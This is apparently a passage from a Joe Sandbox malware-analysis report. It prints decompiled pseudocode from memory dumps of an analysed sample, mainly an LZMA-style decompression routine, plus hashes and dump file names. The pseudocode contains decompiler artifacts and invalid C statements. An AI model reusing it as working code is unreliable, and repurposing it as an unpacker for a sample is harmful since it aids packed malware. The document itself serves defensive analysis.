										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00405E9D, Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00405E9D(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
